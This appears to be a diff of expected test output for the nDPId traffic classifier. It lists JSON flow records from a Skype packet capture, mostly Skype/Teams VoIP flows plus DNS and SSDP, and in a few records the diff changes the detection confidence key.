+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.159","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.145","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.153","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.142","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":51066,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969721954,"flow_last_seen":1431969748262,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969720556,"flow_last_seen":1431969746803,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52742,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 
+00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969723979,"flow_last_seen":1431969750316,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65037,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.152","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969642337,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65045,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 
+00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969745776,"flow_last_seen":1431969747554,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49511,"dst_port":5351,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969745776,"flow_last_seen":1431969747554,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49511,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 